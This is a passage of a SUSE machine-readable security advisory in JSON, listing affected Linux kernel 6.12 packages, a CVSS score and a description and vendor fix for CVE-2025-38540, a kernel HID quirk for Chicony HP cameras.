"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-38540",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38540"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: quirks: Add quirk for 2 Chicony Electronics HP 5MP Cameras\n\nThe Chicony Electronics HP 5MP Cameras (USB ID 04F2:B824 \u0026 04F2:B82C)\nreport a HID sensor interface that is not actually implemented.\nAttempting to access this non-functional sensor via iio_info causes\nsystem hangs as runtime PM tries to wake up an unresponsive sensor.\n\nAdd these 2 devices to the HID ignore list since the sensor interface is\nnon-functional by design and should not be exposed to userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38540",
"url": "https://www.suse.com/security/cve/CVE-2025-38540"
},
{
"category": "external",
"summary": "SUSE Bug 1248208 for CVE-2025-38540",
"url": "https://bugzilla.suse.com/1248208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
